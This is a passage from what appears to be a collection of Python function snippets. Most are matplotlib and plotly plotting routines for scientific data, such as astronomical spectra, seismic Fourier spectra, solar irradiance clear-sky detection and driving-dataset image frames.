X[:N]\n Xcov = Xcov[:N]\n Xcoadd = Xcoadd[:N]\n Xcoaddcov = Xcoaddcov[:N]\n ind = (Xcoaddcov[:, idx][:, idx] < 1.) & (Xcov[:, idx][:, idx] < 1.)\n X = X[ind]\n Xcov = Xcov[ind]\n Xcoadd = Xcoadd[ind]\n Xcoaddcov = Xcoaddcov[ind]\n\n # unpickle the XD model\n if type(model) == str: \n f = open(model, 'rb')\n model = cPickle.load(f)\n f.close()\n\n # Calculate the posteriors, draw samples\n a, m, v = model.posterior(X, Xcov)\n posts = np.zeros_like(X)\n for i in range(X.shape[0]):\n posts[i] = np.median(model.sample(a[i], m[i], v[i], size=1000), axis=0)\n\n stol = 0.145\n ptol = 0.03\n Nbins = 12\n magbins = np.linspace(18., 22., Nbins)\n dlt = magbins[1] - magbins[0]\n s = np.zeros(Nbins)\n p = np.zeros(Nbins)\n for i in range(Nbins):\n ind = (Xcoadd[:, 0] > magbins[i] - dlt) & \\\n (Xcoadd[:, 0] <= magbins[i] + dlt)\n sind = ind & (np.abs(Xcoadd[:, idx]) < 0.03)\n gind = ind & (np.abs(Xcoadd[:, idx]) > 0.03)\n ssind = sind & (np.abs(X[:, idx] > stol))\n sgind = gind & (np.abs(X[:, idx] < stol))\n psind = sind & (np.abs(posts[:, idx] > ptol))\n pgind = gind & (np.abs(posts[:, idx] < ptol))\n s[i] = 1. * len(X[ssind, 0]) + len(X[sgind, 0])\n p[i] = 1. * len(X[psind, 0]) + len(X[pgind, 0])\n s[i] /= len(X[ind, 0])\n p[i] /= len(X[ind, 0])\n\n fs = 5\n lsize = 20\n f = pl.figure(figsize=(fs, fs))\n pl.plot(magbins, s, 'k--', drawstyle='steps-mid', label='Single Epoch',\n lw=2)\n pl.plot(magbins, p, 'k', drawstyle='steps-mid', label='XD Posterior', lw=2)\n pl.xlabel('psfmag $r$', fontsize=lsize)\n pl.ylabel('Misclassification Rate', fontsize=lsize)\n f.savefig(figname, bbox_inches='tight')", "def plot(self):\n # Find only unmasked data :\n # xyz, sData, sColor, _ = self._select_unmasked()\n xyz, sData, sColor = self.xyz, self.sData, self.sColor\n\n # Render as cloud points :\n self.mesh = visu.Markers(name='Sources')\n self.mesh.set_data(xyz, edge_color=self.edgecolor, face_color=sColor,\n size=sData, scaling=self.scaling,\n edge_width=self.edgewidth, symbol=self.symbol)\n self.mesh.set_gl_state('translucent')", "def sample_and_plot(self):\n fig = plt.figure()\n ax = plt.axes(projection = '3d')\n ax.plot_surface(self.X, self.Y, self.sample(), cmap = plt.cm.jet, rstride = 2, cstride = 2, linewidth = 1)\n plt.show()", "def plot12(self, dataset, ts_string_indices, source_jpg_folder='jpg_images', extension='jpg', rows=3, cols=4,\n outfname='Sample Frames.png', cmap=None, gui_color='green'):\n # Settings ############################################################\n font_label_box = {\n 'color': 'green',\n 'size': 16,\n }\n font_steering = {'family': 'monospace',\n # 'color': 'darkred',\n 'weight': 'normal',\n 'size': 20,\n }\n ROWS = rows\n COLS = cols\n NUM_IMAGES = ROWS * COLS\n\n # Figure ##############################################################\n # figsize = [width, height]\n fig = plt.figure(figsize=PAPER_A3_LAND, facecolor='white')\n fig.suptitle(\"Sample frames, Dataset: {}\".format(dataset.data_folder), fontsize=20)\n\n for i, ts_string_index in enumerate(ts_string_indices):\n rec = dataset.df.loc[ts_string_index]\n\n timestamp_string = rec['datetime'].strftime(\"%D %H:%M:%S.\") + \"{:.2}\".format(\n str(rec['datetime'].microsecond))\n\n if 'steering_pred_signal' in dataset.df.columns:\n this_label = \"{}\\n{:0.2f}/{:0.2f} steering \\n{:0.2f} throttle\".format(timestamp_string,\n rec['steering_signal'],\n rec['steering_pred_signal'],\n rec['throttle_signal'])\n else:\n this_label = \"{}\\n{:0.2f}/ steering \\n{:0.2f} throttle\".format(timestamp_string, rec['steering_signal'],\n rec['throttle_signal'])\n\n ax = fig.add_subplot(ROWS, COLS, i + 1)\n\n # Main Image ##########################################################\n jpg_path = os.path.join(dataset.path_dataset, source_jpg_folder, ts_string_index + '.' + extension)\n assert os.path.exists(jpg_path), \"{} does not exist\".format(jpg_path)\n img = mpl.image.imread(jpg_path)\n ax.imshow(img, cmap=cmap)\n # plt.title(str_label)\n\n # Data box ########################################################\n\n # ax.axes.get_xaxis().set_visible(False)\n # ax.axes.get_yaxis().set_visible(False)\n t = ax.text(5, 25, this_label, color=gui_color, alpha=1)\n # t = plt.text(0.5, 0.5, 'text', transform=ax.transAxes, fontsize=30)\n t.set_bbox(dict(facecolor='white', alpha=0.7, edgecolor='none'))\n\n # Steering widget HUD #################################################\n # Steering HUD: Actual steering signal\n steer_actual = ''.join(['|' if v else '-' for v in dataset.linear_bin(rec['steering_signal'])])\n text_steer = ax.text(80, 105, steer_actual, fontdict=font_steering, horizontalalignment='center',\n verticalalignment='center', color=gui_color)\n # Steering HUD: Predicted steering angle\n if 'steering_pred_signal' in dataset.df.columns:\n steer_pred = ''.join(['◈' if v else ' ' for v in dataset.linear_bin(rec['steering_pred_signal'])])\n text_steer_pred = ax.text(80, 95, steer_pred, fontdict=font_steering, horizontalalignment='center',\n verticalalignment='center', color='red')\n\n outpath = os.path.join(dataset.path_dataset, outfname)\n fig.savefig(outpath)\n logging.debug(\"Wrote Sample Frames figure to {}\".format(outpath))", "def create_lag_plot(series_name, lag = 1):\n plt.figure(figsize = (8,5))\n plt.title('Lag Plot of the Trade Value of Imports')\n plt.xlim(min(series_name), max(series_name))\n plt.ylim(min(series_name), max(series_name))\n lag_plot(series_name, lag = lag)\n plt.show()", "def logplot(in_dir, fname, xlim, ylim, title):\n\n with open(in_dir + fname,'r') as logfile:\n lf_lines = logfile.readlines()\n\n traj_x = []\n traj_y = []\n\n for row in lf_lines:\n if row[:4] == 'pose':\n #print(float(row[10:-2]))\n tup = row[7:]\n sep_pos = tup.find(' , ')\n traj_x.append(float(tup[:sep_pos]))\n traj_y.append(float(tup[sep_pos+3:]))\n\n liveplot(traj_x, traj_y, xlim, ylim, title)", "def update_plot(click, contents, filename, start_date, end_date, freq, window_length, mean_diff,\n max_diff, upper_ll, lower_ll, vardiff, slopedev):\n if click < 1:\n return\n\n # params = pd.read_json(params)\n # params = params.apply(pd.to_numeric)\n # params = params.sort_values('Run')\n\n window_length = int(window_length)\n mean_diff = float(mean_diff)\n max_diff = float(max_diff)\n upper_ll = float(upper_ll)\n lower_ll = float(lower_ll)\n slopedev = float(slopedev)\n vardiff = float(vardiff)\n\n\n df = utils.read_df(contents, filename)\n df = df[(df.index >= start_date) & (df.index <= end_date)]\n df = df[df.index.minute % freq == 0]\n is_clear, components, alpha = \\\n cs_utils.detect_clearsky(df['GHI'], df['GHIcs'], df.index,\n window_length=window_length, mean_diff=mean_diff,\n max_diff=max_diff, upper_line_length=upper_ll, lower_line_length=lower_ll,\n slope_dev=slopedev, var_diff=vardiff, return_components=True)\n\n df['GHIcs'] = df['GHIcs'] * alpha\n fig = tls.make_subplots(rows=2, cols=1, shared_xaxes=True)\n\n plots = []\n plots.append(go.Scatter(x=df.index, y=df['GHI'], name='GHI'))\n plots.append(go.Scatter(x=df.index, y=df['GHIcs'], name='GHIcs'))\n plots.append(go.Scatter(x=df[is_clear].index, y=df[is_clear]['GHI'], name='PVLib clear', mode='markers'))\n plots.append(go.Scatter(x=df.index, y=components['mean_diff'],\n name='Mean diff.', visible='legendonly'))\n plots.append(go.Scatter(x=df.index, y=components['max_diff'],\n name='Max diff.', visible='legendonly'))\n plots.append(go.Scatter(x=df.index, y=components['line_length'],\n name='Line length', visible='legendonly'))\n plots.append(go.Scatter(x=df.index, y=components['slope_nstd'],\n name='Slope std. dev.', visible='legendonly'))\n plots.append(go.Scatter(x=df.index, y=components['slope_max'],\n name='Max slope diff.', visible='legendonly'))\n\n for p in plots:\n fig.append_trace(p, 1, 1)\n\n plots2 = []\n passes = pd.DataFrame(components)\n for i, test in enumerate(['mean_diff_pass', 'max_diff_pass', 'line_length_pass',\n 'slope_nstd_pass', 'slope_max_pass']):\n slice = passes[test].astype(int)\n ii = i / 4\n yval = [ii] * len(slice.astype(bool) & passes['non_zero'].astype(bool))\n plots2.append(\n go.Scatter(x=df.index[:len(slice)][slice.astype(bool) & passes['non_zero'].astype(bool)],\n y=yval, name='', mode='markers', showlegend=False)\n )\n\n for p in plots2:\n fig.append_trace(p, 2, 1)\n\n fig['layout']['yaxis2'].update(tickmode='text', tickvals=[0, .25, .5, .75, 1],\n ticktext=['Mean diff.', 'Max diff.', 'Line length',\n 'Slope std. dev.', 'Max slope diff.'])\n fig['layout']['xaxis2'].update(title='Date')\n fig['layout']['yaxis2'].update(domain=[0, 0.2])\n fig['layout']['yaxis1'].update(title='GHI / W/m2')\n fig['layout']['yaxis1'].update(domain=[.25, 1])\n fig['layout'].update(height=500, margin={'l': 100})\n fig['layout'].update(title='Window length: {}, mean diff: {}, max diff: {}, upper line length: {}, '\n 'lower line length: {}, max slope difference: {}, std slope differece: {}'\n .format(window_length, mean_diff, max_diff, upper_ll, lower_ll, slopedev, vardiff))\n\n plots = fig\n\n layout = go.Layout(xaxis={'title': 'Date'}, # yaxis={'title': 'W/m2'},\n title='Window length: {}, mean diff: {}, max diff: {}, upper line length: {}, '\n 'lower line length: {}, max slope difference: {}, std slope differece: {}'\n .format(window_length, mean_diff, max_diff, upper_ll, lower_ll, slopedev, vardiff),\n )\n ts_plot = dcc.Graph(id='cs-plot', figure={'data': plots, 'layout': layout})\n\n # scores = [go.Scatter(x=list(range(len(params))),\n # y=params['F-score'],\n # text=utils.df_to_text(params), hoverinfo='text')]\n # scores_layout = go.Layout(xaxis={'title': 'Run', 'tickvals': [i for i in range(1, len(params))],\n # 'ticktext': [str(i + 1) for i in range(1, len(params))],\n # 'range': [0, len(params)]}, yaxis={'title': 'F-score'})\n # scores_plot = dcc.Graph(id='cs-scores', figure={'data': scores, 'layout': scores_layout})\n #\n # table = dt.DataTable(\n # rows=params[['Run', 'Window length', 'Mean difference', 'Max difference',\n # 'Upper line length', 'Lower line length', 'Variance of slopes',\n # 'Max difference of slopes', 'F-score']].round(3).to_dict('records'),\n # columns=['Run', 'Window length', 'Mean difference', 'Max difference',\n # 'Upper line length', 'Lower line length', 'Variance of slopes',\n # 'Max difference of slopes', 'F-score'],\n # selected_row_indices=[],\n # sortable=True,\n # filterable=True,\n # editable=False,\n # id='cs-param_table'\n # )\n\n final = html.Div([\n html.Div(ts_plot)\n ], style={'width': '98%', 'float': 'center', 'pad': {'l': 40}})\n\n return final", "def plot_spectra(stream, freqs, amps, data_type, plot_dir, synthetic=True, parameter='none', project='none', run='none'):\n \n import matplotlib.pyplot as plt\n \n # Get station info \n tr = stream[0]\n station = tr.stats.station\n \n # Set up plot\n fig, axs = plt.subplots(3)\n \n # Loop through frequencies and amplitudes \n for i in range(len(freqs)):\n \n # Units\n if data_type == 'disp':\n title = 'Disp'\n units = 'm*s'\n code = 'LX' \n ylim = 10**-4, 6*10**-1\n xlim = 2*10**-3, 5*10**-1\n elif data_type == 'acc':\n title = 'Acc'\n units = 'm/s'\n code = 'HN'\n ylim = 6*10**-15, 6*10**-1\n xlim = .002, 10\n elif data_type == 'vel':\n title = 'Vel'\n units = 'm'\n code = 'HN'\n ylim = 6*10**-15, 8*10**-2\n xlim = .002, 10\n \n # Define label \n if i == 0:\n component = 'E'\n elif i == 1:\n component = 'N'\n elif i == 2:\n component = 'Z'\n label = code + component \n \n # Plot spectra\n axs[i].loglog(freqs[i],amps[i], lw=.8, label=label)\n axs[i].grid(linestyle='--')\n axs[i].set_ylim(ylim)\n axs[i].set_xlim(xlim)\n axs[i].legend()\n\n # Format whole figure\n plt.tight_layout()\n plt.subplots_adjust(hspace=0)\n fig.suptitle(f'{station} {title} Fourier Spectra', fontsize=14, y=1.08)\n fig.text(-.03, 0.5, f'Amplitude {units}', va='center', rotation='vertical')\n plt.xlabel('Frequency (Hz)')\n \n if synthetic:\n plt.savefig(f'{plot_dir}/parameters/{parameter}/{project}/plots/fourier_spec/{run}/{data_type}/{station}.{code}.png',bbox_inches='tight',dpi=300)\n else:\n plt.savefig(f'/Users/tnye/tsuquakes/plots/fourier_spec/obs/{data_type}/{station}.{code}.png',bbox_inches='tight',dpi=300) \n \n plt.close()\n\n\n return()", "def view(filename):\n n, data, data_dB,sr,ch=inputwav(filename)\n t=np.linspace(0,n/sr,n)\n py.close()\n fig, (ax1) = py.subplots(nrows=1) \n ax1.plot(t[0:n:100],data[0:n:100],'k-',linewidth=1,label=filename)\n ax1.legend(loc=1)\n ax1.set_ylabel('Amplitude (Rel. Bit)')\n ax1.set_xlabel('Time (s)')", "def visualize(data_stream, runs, coke_windows, title,\n each=10, alpha=0.3, run_color=\"forestgreen\",\n coke_color=\"royalblue\", figsize=(12,4)):\n\n plt.figure(figsize=figsize)\n\n # Plot data stream\n data_stream.iloc[::each].plot(linewidth=1, ax=plt.gca())\n\n ax = plt.gca()\n\n # Add overlays for runs\n for wi, window in runs.iterrows():\n ax.axvspan(window[\"run_start\"], window[\"run_end\"], alpha=alpha, color=run_color)\n\n # Add overlays for coke windows\n for wi, window in coke_windows.iterrows():\n ax.axvspan(window[\"start\"], window[\"end\"], alpha=alpha, color=coke_color)\n\n plt.title(title, fontsize=12)\n plt.tight_layout()\n plt.show()", "def stack_plot(self, nrow=6, show=True):\n import matplotlib.pyplot as plt\n import matplotlib.gridspec as gridspec\n import matplotlib as mpl\n mpl.rcParams['font.family'] = 'stixgeneral'\n mpl.rcParams['font.size'] = 15.\n # Check for spec\n gdiline = []\n for iline in self._abslines:\n if isinstance(iline.analy['spec'],Spectrum1D):\n gdiline.append(iline)\n nplt = len(gdiline)\n if nplt == 0:\n print(\"Load spectra into the absline.analy['spec']\")\n return\n # Setup plot\n nrow = min(nplt,nrow)\n ncol = nplt // nrow + (nplt % nrow > 0)\n plt.clf()\n gs = gridspec.GridSpec(nrow, ncol)\n ymnx = (-0.1,1.1)\n\n for qq,iline in enumerate(gdiline):\n ax = plt.subplot(gs[qq%nrow, qq//nrow])\n # Plot\n velo = iline.analy['spec'].relative_vel((1+iline.attrib['z'])*iline.wrest)\n ax.plot(velo, iline.analy['spec'].flux, 'k-', linestyle='steps-mid')\n ax.plot(velo, iline.analy['spec'].sig, 'r:')\n # Lines\n ax.plot([0]*2, ymnx, 'g--')\n # Axes\n ax.set_xlim(self.vlim.value)\n ax.set_ylim(ymnx)\n ax.minorticks_on()\n if ((qq+1) % nrow == 0) or ((qq+1) == nplt):\n ax.set_xlabel('Relative Velocity (km/s)')\n else:\n ax.get_xaxis().set_ticks([])\n # Label\n ax.text(0.1, 0.1, iline.data['name'], transform=ax.transAxes, ha='left', va='center', fontsize='x-large')#, bbox={'facecolor':'white'})\n\n plt.tight_layout(pad=0.2,h_pad=0.,w_pad=0.1)\n if show:\n plt.show()\n plt.close()", "def visualization(tv_summary, speech_summary, start, stop, mode='interactive'):\n\n # There was a problem with unicode to ascii errors cropping up again in matplotlib\n # TODO fix encoding errors for the following years\n skip_years = [1941, 1942, 1945, 1995, 2005, 2006, 2010, 2011]\n for start_year in [year for year in range(start, stop) if year not in skip_years]:\n print \"Creating figure for \" + str(start_year)\n heat_map, keywords = create_heat_map(source=tv_summary,\n response=speech_summary,\n max_keywords=45,\n start_year=start_year,\n interval=50)\n\n fig = plot_heat_map(heat_map, keywords, start_year)\n\n if mode == 'save':\n # Save fig to file\n fig.set_size_inches(11, 7.5)\n fig.savefig('output/output' + str(start_year) + '.png', dpi=100)\n else:\n plt.draw()\n if mode != 'save':\n plt.show()", "def plotspecSNIa( specfile, age=0, z=1, smooth=0, showerr=False, scale=0, color='k' ):\n import numpy as np\n from scipy import interpolate as scint\n medsmooth = lambda f,N : np.array( [ np.median( f[max(0,i-N):min(len(f),max(0,i-N)+2*N)]) for i in range(len(f)) ] )\n\n try : \n wave, flux, fluxerr = np.loadtxt( specfile, unpack=True, usecols=[0,1,2] )\n # fluxerr = fluxerr / 5.\n except : \n wave, flux = np.loadtxt( specfile, unpack=True, usecols=[0,1] )\n fluxerr = np.ones( len(flux) )\n showerr=False\n \n snwave, snflux = getSNIa( age, z )\n\n snfinterp = scint.interp1d( snwave, snflux, bounds_error=False, fill_value=0 ) \n snf = snfinterp( wave )\n\n if smooth>0 :\n if smooth<5 : \n smooth=5\n order=3\n print(\"raising S-G smooth window to 5, order 3.\")\n if smooth<7 : \n order=3\n else : \n order=5\n flux = savitzky_golay( flux, smooth, order=order )\n elif smooth<0:\n flux = medsmooth( flux, abs(smooth) )\n\n\n if scale :\n if showerr :\n pl.errorbar( wave, flux, fluxerr, marker=' ', color=color, ls='-', drawstyle='steps-mid', capsize=0, lw=0.5, scalex=False )\n else :\n pl.plot( wave, flux, marker=' ', color=color, ls='-', drawstyle='steps', lw=0.5, ) # , scalex=False )\n pl.plot( snwave, snflux * scale , marker=' ', color='r', ls='-', lw=1.5, scalex=False )\n\n else :\n num = np.sum( snf*flux / fluxerr**2 )\n denom = np.sum( snf**2./ fluxerr**2 )\n scale = num / denom\n\n if showerr :\n pl.errorbar( wave, flux/np.median(flux), fluxerr/np.median(flux), marker=' ', color=color, ls='-', drawstyle='steps-mid', capsize=0, lw=0.5, scalex=False )\n else :\n pl.plot( wave, flux/np.median(flux), marker=' ', color=color, ls='-', drawstyle='steps', lw=0.5, ) # , scalex=False )\n pl.plot( snwave, snflux * scale / np.median(flux) , marker=' ', color='r', ls='-', lw=1.5, scalex=False )\n\n ax1 = pl.gca()\n ax2 = ax1.twiny()\n ax2.set_xlim( ax1.get_xlim()[0] / (1+z), ax1.get_xlim()[1] / (1+z) )\n ax1.set_xlabel('Observed Wavelength (\\AA)')\n ax2.set_xlabel('Rest Wavelength (\\AA)')\n\n return(ax1,ax2)", "def plot1d_if(self,obj,**kwargs):\n var=kwargs.get('var',None)\n varstr = kwargs.get('varstr', None)\n box = kwargs.get('box', None)\n psi = kwargs.get('psi', None)\n xlim = kwargs.get('xlim', None)\n initial = kwargs.get('initial',True)\n \n if(type(psi).__module__ != np.__name__): #None or not numpy data\n psi=obj.psi #default psi is obj.psi\n \n if(type(var).__module__ != np.__name__):\n if(varstr==None): \n print(\"Either var or varstr should be defined.\")\n else:\n var=getattr(obj,varstr) #default var is from varstr\n \n stc=var.shape[0]\n fig, ax=plt.subplots()\n lbl=[\"Initial\",\"Final\"]\n if(xlim==None):\n if(initial):\n ax.plot(psi,var[0,],label='Initial')\n ax.plot(psi,var[stc-1,],label='Final')\n else:\n msk=(psi >= xlim[0]) & (psi <= xlim[1])\n if(initial):\n ax.plot(psi[msk],var[0,msk],label='Initial')\n ax.plot(psi[msk],var[stc-1,msk],label='Final')\n \n ax.legend()\n ax.set(xlabel='Normalized Pol. Flux')\n if(varstr!=None):\n ax.set(ylabel=varstr)\n \n #add time stamp of final?\n return fig, ax", "def plot(self):\n pass", "def get_plot(sample):\n scale = (CANVAS_DIM/PATCH_DIM)\n ego_pose = sample[0]\n map_mask = sample[2]\n\n fig, ax = plt.subplots()\n ax.set_ylim([0, CANVAS_DIM]) # set the bounds to be 10, 10\n ax.set_xlim([0, CANVAS_DIM])\n ax.imshow(map_mask[0])\n\n for vehicle in sample[1]:\n plot_vehicle(ax, vehicle, ego_pose, scale)\n\n plt.show()", "def surface_plot(name: str = 'start_date_analysis1.pkl'):\n df = pd.read_pickle(name)\n\n # set up a figure twice as wide as it is tall\n fig = plt.figure(figsize=plt.figaspect(0.5))\n # ===============\n # First subplot\n # ===============\n # set up the axes for the first plot\n ax = fig.add_subplot(1, 2, 1, projection='3d')\n ax.set_title('Modifications per File')\n ax.set_xlabel('Date (Months)')\n ax.set_ylabel('Threshold Individual')\n for idx, row in enumerate(sorted(df['threshold_pairs'].unique())):\n data = df[df['threshold_pairs'] == row]\n label = 'Threshold pairs ' + str(row)\n # Plot the surface.\n surf = ax.plot_trisurf(data['date'], data['threshold'], data['mpf'], alpha=0.7,\n linewidth=0, antialiased=False, label=label)\n surf._facecolors2d = surf._facecolors3d\n surf._edgecolors2d = surf._edgecolors3d\n # ===============\n # Second subplot\n # ===============\n # set up the axes for the second plot\n ax = fig.add_subplot(1, 2, 2, projection='3d')\n ax.set_title('Transitions per Test')\n ax.set_xlabel('Date (Months)')\n ax.set_ylabel('Threshold Individual')\n for idx, row in enumerate(sorted(df['threshold_pairs'].unique())):\n data = df[df['threshold_pairs'] == row]\n label = 'Threshold pairs ' + str(row)\n # Plot the surface.\n\n surf = ax.plot_trisurf(data['date'], data['threshold'], data['tpt'], alpha=0.7,\n linewidth=0, antialiased=False, label=label)\n\n surf._facecolors2d = surf._facecolors3d\n surf._edgecolors2d = surf._edgecolors3d\n\n # cbar = fig.colorbar(surf)\n # cbar.locator = LinearLocator(numticks=10)\n # cbar.update_ticks()\n\n plt.suptitle('Threshold Start Date Analysis 3D', fontsize=14)\n plt.legend()\n plt.show()", "def plot_stream(x,y,gvx,gvy,oargs,outfile):\r\n\t\r\n\tme = \"LE_Plot.plot_stream: \"\r\n\t\r\n\t## Expand out parameters\r\n\tb,X,xmax,ymax,BW,smooth = oargs\r\n\tgv = np.sqrt(gvx*gvx+gvy*gvy)\r\n\t\t\r\n\tshowplot = False\r\n\r\n\t## Smooth data\r\n\tif smooth is not 0.0:\r\n\t\tgvy = gaussian_filter(gvy, smooth)\r\n\t\tgvx = gaussian_filter(gvx, smooth)\r\n\t\tgv = gaussian_filter(gv, smooth)\r\n\toutfile += \"_sm\"+str(smooth)\r\n\t\t\r\n\t## --------------------------------------------------------------------\t\r\n\t\r\n\t## Plotting\r\n\t\r\n\tt0 = time.time()\r\n\tfs = 25\r\n\t\r\n\tfig = plt.figure(facecolor=\"white\")\r\n\tfig.suptitle(outfile)\r\n\t\r\n\t## Add subplot with exact solution\r\n\tif not BW:\r\n\t\tfrom LE_ExactHO import main as plot_exact\r\n\t\tax1 = fig.add_subplot(121,aspect=\"auto\")\r\n\t\tax2 = fig.add_subplot(122,aspect=\"auto\",sharey=ax1)\r\n\t\tplot_exact((ax2,xmax,ymax,b,False))\r\n\t\tfig.tight_layout();fig.subplots_adjust(top=0.93)\r\n\t\tprint me+\"Plotting exact\",round(time.time()-t0,1),\"seconds\"\r\n\telse:\r\n\t\tax1 = fig.add_subplot(111)\r\n\t\r\n\t## Accoutrements\t\r\n\tax1.set_xlim([-xmax,xmax]);\tax1.set_ylim([-ymax,ymax])\r\n\tax1.set_xlabel(\"$x$\",fontsize=fs);ax1.set_ylabel(\"$\\eta$\",fontsize=fs)\r\n\t## Plot wall positions if BW; plot separatrix if HO\r\n\tif BW:\tplot_walls(ax1, X, xmax,ymax,2)\r\n\telse:\tplot_separatrix(ax1, b, xmax, ymax, 2)\r\n\t\r\n\t## Line widths\r\n\tlw1 = 3.0*gv/gv.max()\r\n\t\r\n\tt0=time.time()\r\n\t## Plot absolute speed contour and streamplot\r\n\t## NOTE fudge (-) to force agreement with exact\r\n\t# ax1.contourf(xi,yi,gv, 4, alpha=0.4)\r\n\tax1.streamplot(-x,y, -gvx,gvy, arrowsize=1.8, arrowstyle=\"->\", linewidth=lw1, minlength=xmax/20)\r\n\t\t\t\r\n\tprint me+\"Plotting data \",round(time.time()-t0,1),\"seconds\"; t0=time.time()\r\n\t\t\r\n\t## Output\r\n\tfig.savefig(outfile+\".png\",facecolor=fig.get_facecolor(), edgecolor=\"none\")\r\n\tprint me+\"Plot saved\",outfile+\".png\"\r\n\tif showplot:\tplt.show()\r\n\r\n\tplt.close()\r\n\t\t\t\r\n\treturn", "def __init__(self):\n super(vanderpol_output,self).__init__()\n\n # add figure object for further use\n fig = plt.figure()\n self.ax = fig.add_subplot(111)\n self.ax.set_xlim([-2.5,2.5])\n self.ax.set_ylim([-10.5,10.5])\n plt.ion()\n self.sframe = None", "def simple_pick_plot(cat, n_events, template_dict, st_dict, pyasdf=None, savefiles=False):\n from obspy import Catalog, UTCDateTime, Stream\n from obspy.core.event import ResourceIdentifier\n if n_events == 'all':\n rand_cat = cat\n else:\n rand_cat = rand_cat_sample(cat, n_events)\n # Make a list of year + julday integers to loop over\n min_date = min([ev.preferred_origin().time for ev in rand_cat])\n max_date = max([ev.preferred_origin().time for ev in rand_cat])\n for date in daterange(min_date, max_date):\n day_cat = rand_cat.filter(\"time >= \" + str(UTCDateTime(date)),\n \"time <= \" + str(UTCDateTime(date) + 86400))\n if len(day_cat) == 0:\n continue\n stachans = {pk.waveform_id.station_code: [] for ev in day_cat for pk in ev.picks}\n for ev in day_cat:\n for pick in ev.picks:\n if pick.waveform_id.channel_code not in stachans[pick.waveform_id.station_code]:\n stachans[pick.waveform_id.station_code].append(pick.waveform_id.channel_code)\n print(stachans)\n # Read the waveforms for this day\n if pyasdf:\n st = Stream()\n with pyasdf.ASDFDataSet(pyasdf) as ds:\n for sta in stachans:\n for station in ds.ifilter(ds.q.station == str(sta),\n ds.q.channel == stachans[sta],\n ds.q.starttime >= UTCDateTime(date),\n ds.q.endtime <= UTCDateTime(date) + 86400):\n st += station.raw_recording\n for ev in day_cat:\n det_st = st_dict[ev.resource_id]\n det_temp = template_dict[ResourceIdentifier('smi:local/' +\n str(ev.resource_id).split('/')[-1].split('_')[0] +\n '_1sec')]\n fig = plot_repicked(det_temp, ev.picks, det_st, size=(21, 15), save=savefiles,\n savefile=str(ev.resource_id).split('/')[-1] + '.png',\n title=str(ev.resource_id).split('/')[-1])", "def plot_fr_and_spikes(self, t):\n plt.figure(figsize=(10, 8))\n\n plt.subplot(2, 2, 1)\n self.plot_base_image()\n\n plt.subplot(2, 2, 2)\n self.plot_firing_rates(t, mode='ON')\n plt.title('Retinal Image')\n\n # Spikes\n ax = plt.subplot(2, 2, 3)\n self.plot_spikes(ax, t, mode='ON', moving_average=True)\n\n ax = plt.subplot(2, 2, 4)\n self.plot_spikes(ax, t, mode='OFF', moving_average=True)", "def visualize_scan(self):\n fig = plt.figure()\n ax = fig.add_subplot(111, projection='3d')\n ax.scatter(self.p1_points[:, 0], self.p1_points[:, 1], self.p1_points[:, 2], c='r')\n ax.scatter(self.p2_points[:, 0], self.p2_points[:, 1], self.p2_points[:, 2], c='g')\n ax.scatter(self.p3_points[:, 0], self.p3_points[:, 1], self.p3_points[:, 2], c='b')\n ax.scatter(self.p4_points[:, 0], self.p4_points[:, 1], self.p4_points[:, 2])\n\n ax.set_xlabel('x')\n ax.set_ylabel('y')\n ax.set_zlabel('z')\n plt.show()", "def plot(self):\n\t\tself.plotOfLoopVoltage()", "def plot_priorsamps(meta):\n priorsamps = np.array(meta.priordist.sample_ps(len(meta.colors))[0])\n f = plt.figure(figsize=(5,10))\n sps_log = f.add_subplot(2,1,1)\n sps_lin = f.add_subplot(2,1,2)\n sps_log.set_title(meta.name)\n f.subplots_adjust(hspace=0, wspace=0)\n sps_log.set_ylabel(r'$\\ln[p(z|\\vec{\\theta})]$')\n sps_lin.set_xlabel(r'$z$')\n sps_lin.set_ylabel(r'$p(\\vec{\\theta})$')\n sps_log.set_xlim(meta.binends[0]-meta.bindif,meta.binends[-1]+meta.bindif)#,s_run.seed)#max(n_run.full_logfltNz)+m.log(s_run.seed/meta.zdif)))\n sps_lin.set_xlim(meta.binends[0]-meta.bindif,meta.binends[-1]+meta.bindif)#,s_run.seed)#max(n_run.full_logfltNz)+m.log(s_run.seed/meta.zdif)))\n plotstep(sps_log,meta.binends,meta.logintPz,l=r'Log Interim Prior $\\ln[p(z|\\vec{\\theta}^{0})$]')\n plotstep(sps_lin,meta.binends,meta.intPz,l=r'Interim Prior $p(z|\\vec{\\theta}^{0})$')\n for c in lrange(meta.colors):\n plotstep(sps_log,meta.binends,priorsamps[c]-np.log(meta.ngals),c=meta.colors[c])\n plotstep(sps_lin,meta.binends,np.exp(priorsamps[c]-np.log(meta.ngals)),c=meta.colors[c])\n sps_log.legend(loc='upper right',fontsize='x-small')\n sps_lin.legend(loc='upper right',fontsize='x-small')\n f.savefig(os.path.join(meta.topdir, 'priorsamps.pdf'),bbox_inches='tight', pad_inches = 0)\n return", "def plot_xy(nc,params,tms,lev=None):\n \n import matplotlib.pyplot as plt\n import ggWRFutils as gW\n from datetime import datetime\n import numpy as np\n wvar={}\n for p in params:\n if p != 'Times':\n if p=='WS10':\n wvar[p]=np.sqrt(nc.variables['U10'][:]**2+nc.variables['U10'][:]**2)\n elif p=='UV10': \n wvar['U10']=nc.variables['U10'][:,:,:] \n wvar['V10']=nc.variables['V10'][:,:,:] \n elif p=='UV':\n wvar['U']=nc.variables['U'][:,lev,:,:] \n wvar['V']=nc.variables['V'][:,lev,:,:] \n elif len(nc.variables[p].shape) > 3:\n wvar[p]=nc.variables[p][:,lev,:,:] \n else: \n wvar[p]=nc.variables[p][:] \n Nx,Ny,Nz,lon,lat,dx,dy=gW.getDimensions(nc)\n for p in params:\n if params[p]=='pcolor':\n plt.pcolor(lon,lat,wvar[p][tms,:,:],shading='flat')\n plt.colorbar()\n if params[p]=='contourf':\n plt.contourf(lon,lat,wvar[p][tms,:,:],50)\n plt.colorbar()\n if params[p]=='contour':\n plt.contourf(lon,lat,wvar[p][tms,:,:])\n plt.colorbar()\n if params[p]=='quiver':\n if p=='UV10':\n plt.quiver(lon[::10,::10],lat[::10,::10],wvar['U10'][tms,::10,::10],wvar['V10'][tms,::10,::10],units='width')\n elif p=='UV':\n plt.quiver(lon,lat,wvar['U'][tms,:,:],wvar['V'][tms,:,:])\n plt.hold(True)\n plt.xlim(lon.min(),lon.max())\n plt.ylim(lat.min(),lat.max())\n fig=plt.gcf()\n return fig", "def plotSeismogram(d, rho, v, wavf, wavA=1., noise = 0., usingT=True, wavtyp='RICKER'):\n\n tseis, seis, twav, wav, tref, rseriesconv = syntheticSeismogram(d, rho, v, wavf, wavA, usingT,wavtyp)\n\n noise = 